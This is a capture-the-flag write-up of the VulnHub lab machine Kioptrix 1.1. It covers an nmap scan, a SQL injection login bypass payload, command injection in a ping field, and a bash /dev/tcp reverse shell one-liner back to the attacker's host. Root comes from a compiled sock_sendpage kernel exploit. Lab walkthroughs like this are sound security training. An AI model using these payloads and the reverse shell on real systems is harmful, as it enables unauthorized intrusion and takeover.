# Kioptrix 1.1 ~ VulnHub

* * *

Enumeration
-----------

### NMAP

![Kioptrix 1.1 ~ VulnHub](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985121359/c492b2f6-063c-4e05-88f0-95411a1182d6.jpeg)

First, I went ahead and launched a port scan against the target machine.

    nmap -Pn -A -sV -p- $target

    PORT     STATE SERVICE    REASON         VERSION
    22/tcp   open  ssh        syn-ack ttl 64 OpenSSH 3.9p1 (protocol 1.99)
    |_sshv1: Server supports SSHv1
    80/tcp   open  http       syn-ack ttl 64 Apache httpd 2.0.52 ((CentOS))
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.0.52 (CentOS)
    |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
    111/tcp  open  rpcbind    syn-ack ttl 64 2 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2            111/tcp   rpcbind
    |   100000  2            111/udp   rpcbind
    |   100024  1            615/udp   status
    |_  100024  1            618/tcp   status
    443/tcp  open  ssl/https? syn-ack ttl 64
    | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/emailAddress=root@localhost.localdomain/localityName=SomeCity
    | Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--/organizationalUnitName=SomeOrganizationalUnit/emailAddress=root@localhost.localdomain/localityName=SomeCity
    618/tcp  open  status     syn-ack ttl 64 1 (RPC #100024)
    631/tcp  open  ipp        syn-ack ttl 64 CUPS 1.1
    | http-methods: 
    |   Supported Methods: GET HEAD OPTIONS POST PUT
    |_  Potentially risky methods: PUT
    |_http-server-header: CUPS/1.1
    |_http-title: 403 Forbidden
    3306/tcp open  mysql      syn-ack ttl 64 MySQL (unauthorized)
    MAC Address: 00:0C:29:A3:ED:9F (VMware)
    Device type: general purpose
    Running: Linux 2.6.X
    OS CPE: cpe:/o:linux:linux_kernel:2.6
    OS details: Linux 2.6.9 - 2.6.30

Fine tuned scan results

### WEB - 80

    /cgi-bin/ (Status: 403) [Size: 289]
    /cgi-bin/.html (Status: 403) [Size: 294]
    /index.php (Status: 200) [Size: 667]
    /index.php (Status: 200) [Size: 667]
    /manual (Status: 301) [Size: 315]
    /usage (Status: 403) [Size: 286]

`/`

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-43.png)

`/manual`

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-44.png)

Exploitation
------------

### Authentication Bypass

The web app was vulnerable to SQL Injection Authentication Bypass as shown below.

    admin' or '1'='1'#

[`http://192.168.0.132/index.php`](http://192.168.0.132/index.php)

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-45.png)

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-46.png)

### Command Injection

I noticed that the web app executed commands on the base system based on user input.

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-47.png)

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-48.png)

Thus, I decided to try and inject custom commands into this field to trigger the system to run it.

    127.0.0.1 && whoami

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-49.png)

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-50.png)

As seen above, I was able to get command execution on the machine via the web portal. I then used this vulnerability to get a reverse shell back to my attack box as follows.

    127.0.0.1 && bash -i >& /dev/tcp/192.168.0.108/443 0>&1

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-51.png)

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-53.png)

And it worked!

Privilege Escalation
--------------------

### Linpeas

While running linpeas, I noticed that the box was running a pretty old linux kernel version (2.6.9-55.EL).

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-54.png)

### Searchsploit

I then made my way to searchsploit to look for a kernel exploit that would fit this particular target.

    searchsploit linux 2.6 centos

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-55.png)

    Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' | linux/local/9545.c

This was the exploit I ended up going with this!

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-56.png)

### GCC

I then transferred the file over to the remote machine before compiling it with GCC. This was to ensure that the architecture matched the executable in the end.

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-57.png)

    gcc -o exploit 9545.c

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-58.png)

However, I ran into the shown error. All C source files need a newline at the end of the file for compilation. I just had to add that before compiling again.

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-59.png)

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-60.png)

After fixing that, the exploit compiled with no issues.

### Rooty

![Kioptrix 1.1 ~ VulnHub](/content/images/2021/04/image-61.png)

And I was the root user! 😁

* * *

\-Nee
